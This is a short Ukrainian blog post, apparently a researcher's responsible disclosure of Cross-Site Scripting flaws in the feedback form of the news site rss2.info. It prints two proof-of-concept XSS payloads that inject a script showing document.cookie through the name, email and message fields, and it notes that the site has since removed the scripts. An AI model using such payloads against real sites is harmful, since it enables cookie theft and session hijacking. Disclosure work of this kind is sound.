Уразливості на www.rss2.info
20:36 27.02.200824.09.2007
У квітні, 09.04.2007, я знайшов Cross-Site Scripting уразливості на проекті http://www.rss2.info (агрегатор новин). Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
27.02.2008
XSS:
XSS:
POST запит на сторінці http://www.rss2.info/feedback.php:
"><script>alert(document.cookie)</script>
В полях: Ваше имя, Ваш E-mail.
</textarea><script>alert(document.cookie)</script>
В полі: Сообщение.
Дані уразливості вже виправлені. Причому зроблено це в доволі цікавий спосіб: вразливі скрипти на сайті просто прибрані (щоб не паритися з їх виправленням). Сайт взагалі змінив концепцію і тепер це на агрегатор новин, а блог про RSS.